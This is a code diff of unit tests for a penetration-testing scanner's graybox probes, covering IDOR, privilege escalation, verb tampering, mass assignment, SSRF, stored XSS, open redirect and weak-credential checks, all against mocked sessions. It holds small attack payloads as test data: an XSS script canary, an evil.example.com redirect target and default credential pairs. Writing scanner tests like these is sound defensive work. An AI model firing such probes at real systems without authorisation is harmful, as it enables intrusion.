self.assertTrue(any("Spring4Shell" in t for t in titles), f"Should detect Spring4Shell via binding error. 
Got: {titles}") + class TestBatch5Improvements(unittest.TestCase): """Tests for batch 5: Spring4Shell secondary gate, CVE dedup.""" @@ -7242,8 +4949,8 @@ def fake_post(url, **kwargs): resp.text = "" return resp - with patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", side_effect=fake_get), \ - patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.post", side_effect=fake_post): + with patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", side_effect=fake_get), \ + patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.post", side_effect=fake_post): result = worker._web_test_spring_actuator("1.2.3.4", 7108) findings = result.get("findings", []) @@ -7278,8 +4985,8 @@ def fake_post(url, **kwargs): resp.text = "" return resp - with patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", side_effect=fake_get), \ - patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.post", side_effect=fake_post): + with patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", side_effect=fake_get), \ + patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.post", side_effect=fake_post): result = worker._web_test_spring_actuator("1.2.3.4", 7100) findings = result.get("findings", []) @@ -7291,7 +4998,7 @@ def fake_post(url, **kwargs): def _get_plugin_class(self): if 'extensions.business.cybersec.red_mesh.pentester_api_01' not in sys.modules: - TestPhase1ConfigCID._mock_plugin_modules() + mock_plugin_modules() from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin return PentesterApi01Plugin @@ -7416,35 +5123,3 @@ def test_jetty_all_cves_match(self): expected = {"CVE-2023-26048", "CVE-2023-26049", "CVE-2023-36478", "CVE-2023-40167"} self.assertEqual(cve_ids, expected, f"Should match all 4 Jetty CVEs, got {cve_ids}") - -class VerboseResult(unittest.TextTestResult): - def 
addSuccess(self, test): - super().addSuccess(test) - self.stream.writeln() # emits an extra "\n" after the usual "ok" - -if __name__ == "__main__": - runner = unittest.TextTestRunner(verbosity=2, resultclass=VerboseResult) - suite = unittest.TestSuite() - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(RedMeshOWASPTests)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestFindingsModule)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestCveDatabase)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestCorrelationEngine)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestScannerEnhancements)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestPhase1ConfigCID)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestPhase2PassFinalization)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestPhase4UiAggregate)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestPhase3Archive)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestPhase5Endpoints)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestPhase12LiveProgress)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestPhase14Purge)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestPhase15Listing)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestPhase16ScanMetrics)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestPhase17aQuickWins)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestPhase17bMediumFeatures)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestOWASPFullCoverage)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestDetectionGapFixes)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestBatch2GapFixes)) - 
suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestBatch3GapFixes)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestBatch4JavaGapFixes)) - suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(TestBatch5Improvements)) - runner.run(suite) diff --git a/extensions/business/cybersec/red_mesh/tests/test_probes_access.py b/extensions/business/cybersec/red_mesh/tests/test_probes_access.py new file mode 100644 index 00000000..39ac1c1a --- /dev/null +++ b/extensions/business/cybersec/red_mesh/tests/test_probes_access.py @@ -0,0 +1,332 @@ +"""Tests for AccessControlProbes.""" + +import unittest +from unittest.mock import MagicMock + +from extensions.business.cybersec.red_mesh.graybox.probes.access_control import AccessControlProbes +from extensions.business.cybersec.red_mesh.graybox.findings import GrayboxFinding +from extensions.business.cybersec.red_mesh.graybox.models.target_config import ( + GrayboxTargetConfig, AccessControlConfig, IdorEndpoint, AdminEndpoint, + BusinessLogicConfig, RecordEndpoint, +) + + +def _mock_response(status=200, text="", content_type="application/json", json_data=None): + resp = MagicMock() + resp.status_code = status + resp.text = text + resp.headers = {"content-type": content_type} + resp.json.return_value = json_data or {} + return resp + + +def _make_probe(idor_endpoints=None, admin_endpoints=None, + regular_username="alice", discovered_routes=None, + regular_session=None, allow_stateful=False): + cfg = GrayboxTargetConfig( + access_control=AccessControlConfig( + idor_endpoints=idor_endpoints or [], + admin_endpoints=admin_endpoints or [], + ), + ) + auth = MagicMock() + auth.regular_session = regular_session or MagicMock() + safety = MagicMock() + safety.throttle = MagicMock() + + probe = AccessControlProbes( + target_url="http://testapp.local:8000", + auth_manager=auth, + target_config=cfg, + safety=safety, + discovered_routes=discovered_routes or [], + regular_username=regular_username, + 
allow_stateful=allow_stateful, + ) + return probe + + +class TestIdorProbe(unittest.TestCase): + + def test_idor_confirmed(self): + """Owner mismatch → vulnerable/HIGH.""" + ep = IdorEndpoint(path="/api/records/{id}/", test_ids=[99], owner_field="owner") + probe = _make_probe(idor_endpoints=[ep]) + probe.auth.regular_session.get.return_value = _mock_response( + json_data={"owner": "bob", "data": "secret"}, + ) + probe.auth.regular_session.get.return_value.json.return_value = {"owner": "bob", "data": "secret"} + + findings = probe.run() + vuln = [f for f in findings if f.status == "vulnerable"] + self.assertEqual(len(vuln), 1) + self.assertEqual(vuln[0].scenario_id, "PT-A01-01") + self.assertEqual(vuln[0].severity, "HIGH") + self.assertIn("CWE-639", vuln[0].cwe) + + def test_idor_not_vulnerable(self): + """All owners match logged-in user → not_vulnerable/INFO.""" + ep = IdorEndpoint(path="/api/records/{id}/", test_ids=[1], owner_field="owner") + probe = _make_probe(idor_endpoints=[ep], regular_username="alice") + probe.auth.regular_session.get.return_value = _mock_response( + json_data={"owner": "alice"}, + ) + probe.auth.regular_session.get.return_value.json.return_value = {"owner": "alice"} + + findings = probe.run() + clean = [f for f in findings if f.status == "not_vulnerable"] + self.assertEqual(len(clean), 1) + self.assertEqual(clean[0].scenario_id, "PT-A01-01") + + def test_idor_one_finding_per_scenario(self): + """Multiple endpoints → exactly one finding.""" + eps = [ + IdorEndpoint(path="/api/records/{id}/", test_ids=[1, 2], owner_field="owner"), + IdorEndpoint(path="/api/users/{id}/", test_ids=[1], owner_field="owner"), + ] + probe = _make_probe(idor_endpoints=eps) + probe.auth.regular_session.get.return_value = _mock_response( + json_data={"owner": "bob"}, + ) + probe.auth.regular_session.get.return_value.json.return_value = {"owner": "bob"} + + findings = probe.run() + a01_findings = [f for f in findings if f.scenario_id == "PT-A01-01"] + 
self.assertEqual(len(a01_findings), 1) + + def test_idor_no_regular_username(self): + """Returns without findings when regular_username is empty.""" + ep = IdorEndpoint(path="/api/records/{id}/", test_ids=[1]) + probe = _make_probe(idor_endpoints=[ep], regular_username="") + findings = probe.run() + # No PT-A01-01 findings at all (no vulnerable, no not_vulnerable) + a01 = [f for f in findings if f.scenario_id == "PT-A01-01"] + self.assertEqual(len(a01), 0) + + def test_idor_inference(self): + """/api/records/1/ inferred from discovered routes.""" + probe = _make_probe( + discovered_routes=["/api/records/1/", "/api/records/2/", "/about/"], + ) + probe.auth.regular_session.get.return_value = _mock_response( + json_data={"owner": "bob"}, + ) + probe.auth.regular_session.get.return_value.json.return_value = {"owner": "bob"} + + findings = probe.run() + a01 = [f for f in findings if f.scenario_id == "PT-A01-01"] + self.assertEqual(len(a01), 1) + self.assertEqual(a01[0].status, "vulnerable") + + def test_idor_no_endpoints(self): + """No endpoints and no discoverable routes → no findings, no error.""" + probe = _make_probe(idor_endpoints=[], discovered_routes=[]) + findings = probe.run() + a01 = [f for f in findings if f.scenario_id == "PT-A01-01"] + self.assertEqual(len(a01), 0) + + +class TestPrivilegeEscProbe(unittest.TestCase): + + def test_privilege_esc_confirmed(self): + """Admin endpoint + content markers → vulnerable/HIGH.""" + ep = AdminEndpoint( + path="/api/admin/users/", + method="GET", + content_markers=["email", "role"], + ) + probe = _make_probe(admin_endpoints=[ep]) + probe.auth.regular_session.get.return_value = _mock_response( + status=200, + text='{"email": "admin@x.com", "role": "superuser"}', + content_type="text/html", + ) + + findings = probe.run() + vuln = [f for f in findings if f.scenario_id == "PT-A01-02" and f.status == "vulnerable"] + self.assertEqual(len(vuln), 1) + self.assertEqual(vuln[0].severity, "HIGH") + + def 
test_privilege_esc_inconclusive(self): + """200 but no content markers → inconclusive/LOW.""" + ep = AdminEndpoint( + path="/api/admin/users/", + method="GET", + content_markers=["secret_data"], + ) + probe = _make_probe(admin_endpoints=[ep]) + probe.auth.regular_session.get.return_value = _mock_response( + status=200, + text="Welcome", + content_type="text/html", + ) + + findings = probe.run() + inc = [f for f in findings if f.scenario_id == "PT-A01-02" and f.status == "inconclusive"] + self.assertEqual(len(inc), 1) + self.assertEqual(inc[0].severity, "LOW") + + def test_privilege_esc_denial_body(self): + """200 + 'access denied' in body → skip (no finding).""" + ep = AdminEndpoint( + path="/api/admin/users/", + method="GET", + content_markers=["email"], + ) + probe = _make_probe(admin_endpoints=[ep]) + probe.auth.regular_session.get.return_value = _mock_response( + status=200, + text="Access Denied. You are not authorized.", + content_type="text/html", + ) + + findings = probe.run() + a02 = [f for f in findings if f.scenario_id == "PT-A01-02"] + self.assertEqual(len(a02), 0) + + +class TestCapabilityDeclarations(unittest.TestCase): + + def test_capabilities(self): + """AccessControlProbes declares correct capabilities.""" + self.assertTrue(AccessControlProbes.requires_auth) + self.assertTrue(AccessControlProbes.requires_regular_session) + self.assertFalse(AccessControlProbes.is_stateful) + + def test_all_findings_are_graybox(self): + """All emitted findings are GrayboxFinding instances.""" + ep = IdorEndpoint(path="/api/records/{id}/", test_ids=[1]) + probe = _make_probe(idor_endpoints=[ep]) + probe.auth.regular_session.get.return_value = _mock_response( + json_data={"owner": "bob"}, + ) + probe.auth.regular_session.get.return_value.json.return_value = {"owner": "bob"} + + findings = probe.run() + for f in findings: + self.assertIsInstance(f, GrayboxFinding) + + +class TestVerbTampering(unittest.TestCase): + + def test_verb_tampering_bypass(self): + """Admin 
endpoint denies GET but accepts PUT → vulnerable/HIGH.""" + ep = AdminEndpoint(path="/api/admin/users/", method="GET") + probe = _make_probe(admin_endpoints=[ep]) + session = probe.auth.regular_session + + # Baseline GET → 403 + baseline = _mock_response(status=403, text="Forbidden") + # PUT → 200 (bypass) + bypass = _mock_response(status=200, text='{"users": []}') + + call_count = [0] + def mock_request(method, url, **kwargs): + call_count[0] += 1 + if method == "GET": + return baseline + return bypass + + session.request = MagicMock(side_effect=mock_request) + + probe._test_verb_tampering() + vuln = [f for f in probe.findings if f.scenario_id == "PT-A01-03" and f.status == "vulnerable"] + self.assertEqual(len(vuln), 1) + self.assertEqual(vuln[0].severity, "HIGH") + self.assertIn("CWE-650", vuln[0].cwe) + + def test_verb_tampering_all_denied(self): + """All methods return 403 → not_vulnerable.""" + ep = AdminEndpoint(path="/api/admin/users/", method="GET") + probe = _make_probe(admin_endpoints=[ep]) + session = probe.auth.regular_session + session.request = MagicMock(return_value=_mock_response(status=403, text="Forbidden")) + + probe._test_verb_tampering() + clean = [f for f in probe.findings if f.scenario_id == "PT-A01-03" and f.status == "not_vulnerable"] + self.assertEqual(len(clean), 1) + + def test_verb_tampering_baseline_accessible(self): + """Endpoint already accessible via normal method → skip (not a tampering target).""" + ep = AdminEndpoint(path="/api/public/", method="GET") + probe = _make_probe(admin_endpoints=[ep]) + session = probe.auth.regular_session + session.request = MagicMock(return_value=_mock_response(status=200, text="Public data")) + + probe._test_verb_tampering() + a01_03 = [f for f in probe.findings if f.scenario_id == "PT-A01-03"] + self.assertEqual(len(a01_03), 0) + + def test_verb_tampering_no_endpoints(self): + """No admin endpoints → no findings.""" + probe = _make_probe(admin_endpoints=[]) + probe._test_verb_tampering() + 
self.assertEqual(len([f for f in probe.findings if f.scenario_id == "PT-A01-03"]), 0) + + +class TestMassAssignment(unittest.TestCase): + + def test_mass_assignment_detected(self): + """Privilege field persisted → vulnerable/HIGH.""" + probe = _make_probe(allow_stateful=True) + probe.discovered_forms = ["/profile/"] + session = probe.auth.regular_session + + form_html = '
    ' + # After POST, GET shows is_admin in response + verify_html = '
    ' + + call_count = [0] + def mock_get(url, **kwargs): + call_count[0] += 1 + if call_count[0] <= 1: + return _mock_response(status=200, text=form_html) + return _mock_response(status=200, text=verify_html) + + session.get = MagicMock(side_effect=mock_get) + session.post = MagicMock(return_value=_mock_response(status=302, text="")) + probe.auth.detected_csrf_field = None + probe.auth.extract_csrf_value = MagicMock(return_value=None) + + probe._test_mass_assignment() + vuln = [f for f in probe.findings if f.scenario_id == "PT-A04-01" and f.status == "vulnerable"] + self.assertEqual(len(vuln), 1) + self.assertEqual(vuln[0].severity, "HIGH") + self.assertIn("CWE-915", vuln[0].cwe) + + def test_mass_assignment_rejected(self): + """Server rejects extra fields → not_vulnerable.""" + probe = _make_probe(allow_stateful=True) + probe.discovered_forms = ["/profile/"] + session = probe.auth.regular_session + + form_html = '
    ' + session.get = MagicMock(return_value=_mock_response(status=200, text=form_html)) + session.post = MagicMock(return_value=_mock_response( + status=200, text="
    Unknown field
    ", + )) + probe.auth.detected_csrf_field = None + probe.auth.extract_csrf_value = MagicMock(return_value=None) + + probe._test_mass_assignment() + clean = [f for f in probe.findings if f.scenario_id == "PT-A04-01" and f.status == "not_vulnerable"] + self.assertEqual(len(clean), 1) + + def test_mass_assignment_gated(self): + """Skipped when allow_stateful=False → inconclusive.""" + probe = _make_probe(allow_stateful=False) + findings = probe.run() + skip = [f for f in findings if f.scenario_id == "PT-A04-01" and f.status == "inconclusive"] + self.assertEqual(len(skip), 1) + self.assertIn("stateful_probes_disabled=True", skip[0].evidence) + + def test_mass_assignment_no_forms(self): + """No forms → no findings.""" + probe = _make_probe(allow_stateful=True) + probe.discovered_forms = [] + probe._test_mass_assignment() + self.assertEqual(len([f for f in probe.findings if f.scenario_id == "PT-A04-01"]), 0) + + +if __name__ == '__main__': + unittest.main() diff --git a/extensions/business/cybersec/red_mesh/tests/test_probes_business.py b/extensions/business/cybersec/red_mesh/tests/test_probes_business.py new file mode 100644 index 00000000..6e4f651e --- /dev/null +++ b/extensions/business/cybersec/red_mesh/tests/test_probes_business.py @@ -0,0 +1,210 @@ +"""Tests for BusinessLogicProbes.""" + +import unittest +from unittest.mock import MagicMock, call + +from extensions.business.cybersec.red_mesh.graybox.probes.business_logic import BusinessLogicProbes +from extensions.business.cybersec.red_mesh.graybox.findings import GrayboxFinding +from extensions.business.cybersec.red_mesh.graybox.models.target_config import ( + GrayboxTargetConfig, BusinessLogicConfig, WorkflowEndpoint, +) +from extensions.business.cybersec.red_mesh.constants import GRAYBOX_MAX_WEAK_ATTEMPTS + + +def _mock_response(status=200, text="", headers=None): + resp = MagicMock() + resp.status_code = status + resp.text = text + resp.headers = headers or {"content-type": "text/html"} + return resp + + 
+def _make_probe(workflow_endpoints=None, allow_stateful=False, + regular_session=None): + cfg = GrayboxTargetConfig( + business_logic=BusinessLogicConfig( + workflow_endpoints=workflow_endpoints or [], + ), + ) + auth = MagicMock() + auth.regular_session = regular_session or MagicMock() + auth.official_session = MagicMock() + auth.anon_session = MagicMock() + auth.target_url = "http://testapp.local:8000" + auth.target_config = cfg + safety = MagicMock() + safety.throttle = MagicMock() + safety.throttle_auth = MagicMock() + safety.clamp_attempts = MagicMock(side_effect=lambda x: min(x, GRAYBOX_MAX_WEAK_ATTEMPTS)) + + probe = BusinessLogicProbes( + target_url="http://testapp.local:8000", + auth_manager=auth, + target_config=cfg, + safety=safety, + allow_stateful=allow_stateful, + regular_username="alice", + ) + return probe + + +class TestStatefulGating(unittest.TestCase): + + def test_stateful_disabled(self): + """Returns inconclusive skip finding when stateful=False.""" + probe = _make_probe(allow_stateful=False) + findings = probe.run() + skip = [f for f in findings if f.scenario_id == "PT-A06-01" and f.status == "inconclusive"] + self.assertEqual(len(skip), 1) + self.assertIn("stateful_probes_disabled=True", skip[0].evidence) + + def test_stateful_enabled(self): + """Runs workflow probe when stateful=True.""" + ep = WorkflowEndpoint(path="/api/orders/1/force-pay/", method="POST", expected_guard="403") + probe = _make_probe( + workflow_endpoints=[ep], + allow_stateful=True, + ) + # Simulate a successful bypass: POST returns 200 instead of 403 + probe.auth.regular_session.post.return_value = _mock_response( + status=200, text="Payment processed", + ) + probe.auth.regular_session.get.return_value = _mock_response(status=200, text="OK") + + findings = probe.run() + vuln = [f for f in findings if f.scenario_id == "PT-A06-01" and f.status == "vulnerable"] + self.assertEqual(len(vuln), 1) + self.assertEqual(vuln[0].severity, "HIGH") + + +class 
TestWeakAuth(unittest.TestCase): + + def test_weak_auth_budget(self): + """Respects hard cap from safety.clamp_attempts.""" + probe = _make_probe() + # Request more than max — should be clamped + probe.safety.clamp_attempts.side_effect = None + probe.safety.clamp_attempts.return_value = 3 + + # Provide 5 candidates but budget is 3 + candidates = ["u1:p1", "u2:p2", "u3:p3", "u4:p4", "u5:p5"] + probe.auth.try_credentials.return_value = None + + # Mock the lockout check + check_session = MagicMock() + check_session.get.return_value = _mock_response(status=200, text="Login") + check_session.close = MagicMock() + probe.auth.make_anonymous_session.return_value = check_session + + probe.run_weak_auth(candidates, max_attempts=100) + # clamp_attempts was called with 100 + probe.safety.clamp_attempts.assert_called_with(100) + # try_credentials should be called at most 3 times + self.assertLessEqual(probe.auth.try_credentials.call_count, 3) + + def test_weak_auth_success(self): + """Weak cred found → vulnerable.""" + probe = _make_probe() + probe.safety.clamp_attempts.return_value = 10 + + mock_session = MagicMock() + mock_session.close = MagicMock() + + # First cred fails, second succeeds + probe.auth.try_credentials.side_effect = [None, mock_session] + + check_session = MagicMock() + check_session.get.return_value = _mock_response(status=200, text="Login page") + check_session.close = MagicMock() + probe.auth.make_anonymous_session.return_value = check_session + + findings = probe.run_weak_auth(["admin:wrong", "admin:admin"], max_attempts=10) + vuln = [f for f in findings if f.scenario_id == "PT-A07-01" and f.status == "vulnerable"] + self.assertEqual(len(vuln), 1) + self.assertEqual(vuln[0].severity, "HIGH") + self.assertIn("CWE-307", vuln[0].cwe) + + def test_weak_auth_lockout_429(self): + """429 response → abort + inconclusive.""" + probe = _make_probe() + probe.safety.clamp_attempts.return_value = 10 + + probe.auth.try_credentials.return_value = None + + check_session = 
MagicMock() + check_session.get.return_value = _mock_response(status=429, text="Rate limited") + check_session.close = MagicMock() + probe.auth.make_anonymous_session.return_value = check_session + + findings = probe.run_weak_auth(["admin:test"], max_attempts=10) + lockout = [f for f in findings if f.scenario_id == "PT-A07-01" and f.status == "inconclusive"] + self.assertEqual(len(lockout), 1) + self.assertIn("Account lockout detected", lockout[0].title) + + def test_weak_auth_lockout_body(self): + """'account locked' in body → abort.""" + probe = _make_probe() + probe.safety.clamp_attempts.return_value = 10 + + probe.auth.try_credentials.return_value = None + + check_session = MagicMock() + check_session.get.return_value = _mock_response( + status=200, text="Your account locked due to too many failed attempts", + ) + check_session.close = MagicMock() + probe.auth.make_anonymous_session.return_value = check_session + + findings = probe.run_weak_auth(["admin:test"], max_attempts=10) + lockout = [f for f in findings if f.scenario_id == "PT-A07-01" and f.status == "inconclusive"] + self.assertEqual(len(lockout), 1) + + def test_weak_auth_uses_public_api(self): + """Calls try_credentials, not _try_login.""" + probe = _make_probe() + probe.safety.clamp_attempts.return_value = 10 + probe.auth.try_credentials.return_value = None + + check_session = MagicMock() + check_session.get.return_value = _mock_response(status=200, text="Login") + check_session.close = MagicMock() + probe.auth.make_anonymous_session.return_value = check_session + + probe.run_weak_auth(["admin:pass"], max_attempts=5) + probe.auth.try_credentials.assert_called_once_with("admin", "pass") + + def test_weak_auth_empty_candidates(self): + """Empty candidate list → returns findings unchanged.""" + probe = _make_probe() + findings = probe.run_weak_auth([], max_attempts=10) + # No PT-A07-01 findings + a07 = [f for f in findings if f.scenario_id == "PT-A07-01"] + self.assertEqual(len(a07), 0) + + def 
test_weak_auth_skips_no_colon(self): + """Candidates without ':' separator are skipped.""" + probe = _make_probe() + probe.safety.clamp_attempts.return_value = 10 + + probe.run_weak_auth(["nocolon", "also_no_colon"], max_attempts=10) + probe.auth.try_credentials.assert_not_called() + + +class TestCapabilities(unittest.TestCase): + + def test_capabilities(self): + """BusinessLogicProbes declares correct capabilities.""" + self.assertTrue(BusinessLogicProbes.requires_auth) + self.assertTrue(BusinessLogicProbes.requires_regular_session) + self.assertTrue(BusinessLogicProbes.is_stateful) + + def test_all_findings_are_graybox(self): + """All findings are GrayboxFinding instances.""" + probe = _make_probe(allow_stateful=False) + findings = probe.run() + for f in findings: + self.assertIsInstance(f, GrayboxFinding) + + +if __name__ == '__main__': + unittest.main() diff --git a/extensions/business/cybersec/red_mesh/tests/test_probes_injection.py b/extensions/business/cybersec/red_mesh/tests/test_probes_injection.py new file mode 100644 index 00000000..88887638 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/tests/test_probes_injection.py @@ -0,0 +1,370 @@ +"""Tests for InjectionProbes.""" + +import unittest +from unittest.mock import MagicMock + +from extensions.business.cybersec.red_mesh.graybox.probes.injection import InjectionProbes +from extensions.business.cybersec.red_mesh.graybox.findings import GrayboxFinding +from extensions.business.cybersec.red_mesh.graybox.models.target_config import ( + GrayboxTargetConfig, InjectionConfig, SsrfEndpoint, +) + + +def _mock_response(status=200, text="", headers=None, content_type="text/html"): + resp = MagicMock() + resp.status_code = status + resp.text = text + h = {"content-type": content_type} + if headers: + h.update(headers) + resp.headers = h + return resp + + +def _make_probe(ssrf_endpoints=None, discovered_forms=None, + official_session=None, allow_stateful=False, + login_path="/auth/login/", 
logout_path="/auth/logout/"): + cfg = GrayboxTargetConfig( + injection=InjectionConfig(ssrf_endpoints=ssrf_endpoints or []), + login_path=login_path, + logout_path=logout_path, + ) + auth = MagicMock() + auth.official_session = official_session or MagicMock() + auth.anon_session = MagicMock() + auth.detected_csrf_field = None + auth.extract_csrf_value = MagicMock(return_value=None) + safety = MagicMock() + safety.throttle = MagicMock() + + probe = InjectionProbes( + target_url="http://testapp.local:8000", + auth_manager=auth, + target_config=cfg, + safety=safety, + discovered_forms=discovered_forms or [], + allow_stateful=allow_stateful, + ) + return probe + + +class TestSsrfProbe(unittest.TestCase): + + def test_ssrf_reflected(self): + """Callback in response body → vulnerable.""" + ep = SsrfEndpoint(path="/api/fetch/", param="url") + probe = _make_probe(ssrf_endpoints=[ep]) + session = probe.auth.official_session + + # Baseline + baseline_resp = _mock_response(status=200, text="nothing") + # Probe: reflected SSRF + probe_resp = _mock_response( + status=200, text="fetched: http://127.0.0.1:1/internal-probe data", + ) + session.get.side_effect = [baseline_resp, probe_resp] + + probe._test_ssrf() + vuln = [f for f in probe.findings if f.scenario_id == "PT-API7-01" and f.status == "vulnerable"] + self.assertEqual(len(vuln), 1) + self.assertEqual(vuln[0].severity, "MEDIUM") + self.assertIn("CWE-918", vuln[0].cwe) + + def test_ssrf_no_hit(self): + """Normal response → no finding.""" + ep = SsrfEndpoint(path="/api/fetch/", param="url") + probe = _make_probe(ssrf_endpoints=[ep]) + session = probe.auth.official_session + + resp = _mock_response(status=200, text="safe content") + session.get.return_value = resp + + probe._test_ssrf() + api7 = [f for f in probe.findings if f.scenario_id == "PT-API7-01"] + self.assertEqual(len(api7), 0) + + +class TestLoginInjection(unittest.TestCase): + + def test_login_injection_no_reflection(self): + """No reflection → not_vulnerable.""" 
+ probe = _make_probe() + anon = MagicMock() + anon.get.return_value = _mock_response( + text='
    ', + ) + anon.post.return_value = _mock_response(text="Invalid credentials") + anon.close = MagicMock() + probe.auth.make_anonymous_session.return_value = anon + probe.auth.detected_csrf_field = None + + probe._test_login_injection() + clean = [f for f in probe.findings if f.scenario_id == "PT-A05-01" and f.status == "not_vulnerable"] + self.assertEqual(len(clean), 1) + + +class TestAuthenticatedInjection(unittest.TestCase): + + def test_authenticated_injection(self): + """Payload reflected in form → finding.""" + probe = _make_probe(discovered_forms=["/search/"]) + session = probe.auth.official_session + # GET the form page → has text input + session.get.return_value = _mock_response( + text='
    ', + ) + # POST with payload → reflection + session.post.return_value = _mock_response( + text='Results for: ', + ) + + probe._test_authenticated_injection() + vuln = [f for f in probe.findings if f.scenario_id == "PT-A03-01" and f.status == "vulnerable"] + self.assertEqual(len(vuln), 1) + + def test_authenticated_injection_no_forms(self): + """No forms → skip.""" + probe = _make_probe(discovered_forms=[]) + probe._test_authenticated_injection() + self.assertEqual(len(probe.findings), 0) + + def test_authenticated_injection_skips_login(self): + """Login form excluded from authenticated injection.""" + probe = _make_probe( + discovered_forms=["/auth/login/", "/search/"], + login_path="/auth/login/", + ) + session = probe.auth.official_session + # Only /search/ should be tested + session.get.return_value = _mock_response( + text='
    ', + ) + session.post.return_value = _mock_response(text="No reflection here") + + probe._test_authenticated_injection() + # Should have tested 1 form (not 2) + # Check that no vulnerable finding for login form + for f in probe.findings: + if f.status == "vulnerable": + for ev in f.evidence: + self.assertNotIn("/auth/login/", ev) + + +class TestStoredXss(unittest.TestCase): + + def test_stored_xss_detected(self): + """Canary reflected unescaped → vulnerable.""" + probe = _make_probe( + discovered_forms=["/comments/"], + allow_stateful=True, + ) + session = probe.auth.official_session + + # GET form page with text input + form_html = '
    ' + # On readback, the canary is reflected unescaped + call_count = [0] + + def mock_get(url, **kwargs): + call_count[0] += 1 + if call_count[0] == 1: + return _mock_response(text=form_html) + else: + # Readback — extract the canary from the POST + # We need to include both the canary and the full payload + return _mock_response( + text="
    <script>XSS-CANARY-12345678</script>
    ", + ) + + session.get.side_effect = mock_get + session.post.return_value = _mock_response(text="Saved") + + # Patch uuid to get predictable canary + import unittest.mock + with unittest.mock.patch("uuid.uuid4") as mock_uuid: + mock_uuid.return_value.hex = "12345678abcdef01" + probe._test_stored_xss() + + vuln = [f for f in probe.findings if f.scenario_id == "PT-A03-02" and f.status == "vulnerable"] + self.assertEqual(len(vuln), 1) + self.assertEqual(vuln[0].severity, "HIGH") + self.assertIn("CWE-79", vuln[0].cwe) + + def test_stored_xss_escaped(self): + """Canary HTML-encoded → not_vulnerable.""" + probe = _make_probe( + discovered_forms=["/comments/"], + allow_stateful=True, + ) + session = probe.auth.official_session + + form_html = '
    ' + call_count = [0] + + def mock_get(url, **kwargs): + call_count[0] += 1 + if call_count[0] == 1: + return _mock_response(text=form_html) + else: + return _mock_response(text="
    &lt;img src=x&gt;
    ") + + session.get.side_effect = mock_get + session.post.return_value = _mock_response(text="Saved") + + probe._test_stored_xss() + vuln = [f for f in probe.findings if f.scenario_id == "PT-A03-02" and f.status == "vulnerable"] + self.assertEqual(len(vuln), 0) + clean = [f for f in probe.findings if f.scenario_id == "PT-A03-02" and f.status == "not_vulnerable"] + self.assertEqual(len(clean), 1) + + def test_stored_xss_skips_login(self): + """Login/logout forms excluded.""" + probe = _make_probe( + discovered_forms=["/auth/login/", "/auth/logout/"], + allow_stateful=True, + login_path="/auth/login/", + logout_path="/auth/logout/", + ) + + probe._test_stored_xss() + # No forms tested → no findings + self.assertEqual(len(probe.findings), 0) + + def test_stored_xss_gated(self): + """Skipped when allow_stateful=False → emits inconclusive.""" + probe = _make_probe( + discovered_forms=["/comments/"], + allow_stateful=False, + ) + + # The gating is in run(), not _test_stored_xss directly + # We need to call run() and check it emits the skip finding + # Set up minimal mocks for other probes that run() calls + anon = MagicMock() + anon.get.return_value = _mock_response(text="no reflection") + anon.post.return_value = _mock_response(text="no reflection") + anon.close = MagicMock() + probe.auth.make_anonymous_session.return_value = anon + + findings = probe.run() + skip = [f for f in findings if f.scenario_id == "PT-A03-02" and f.status == "inconclusive"] + self.assertEqual(len(skip), 1) + self.assertIn("stateful_probes_disabled=True", skip[0].evidence) + + +class TestOpenRedirect(unittest.TestCase): + + def test_open_redirect_detected(self): + """Redirect to evil domain → vulnerable/MEDIUM.""" + probe = _make_probe() + session = probe.auth.official_session + + # Response: 302 redirect to evil.example.com + redirect_resp = _mock_response(status=302, text="") + redirect_resp.headers["Location"] = "//evil.example.com" + session.get = MagicMock(return_value=redirect_resp) + + 
probe._test_open_redirect() + vuln = [f for f in probe.findings if f.scenario_id == "PT-A01-04" and f.status == "vulnerable"] + self.assertEqual(len(vuln), 1) + self.assertEqual(vuln[0].severity, "MEDIUM") + self.assertIn("CWE-601", vuln[0].cwe) + + def test_open_redirect_safe(self): + """No redirect → not_vulnerable.""" + probe = _make_probe() + session = probe.auth.official_session + session.get = MagicMock(return_value=_mock_response(status=200, text="Normal page")) + + probe._test_open_redirect() + clean = [f for f in probe.findings if f.scenario_id == "PT-A01-04" and f.status == "not_vulnerable"] + self.assertEqual(len(clean), 1) + + def test_open_redirect_internal_redirect(self): + """Redirect to same domain → not vulnerable.""" + probe = _make_probe() + session = probe.auth.official_session + + redirect_resp = _mock_response(status=302, text="") + redirect_resp.headers["Location"] = "/dashboard/" + session.get = MagicMock(return_value=redirect_resp) + + probe._test_open_redirect() + vuln = [f for f in probe.findings if f.scenario_id == "PT-A01-04" and f.status == "vulnerable"] + self.assertEqual(len(vuln), 0) 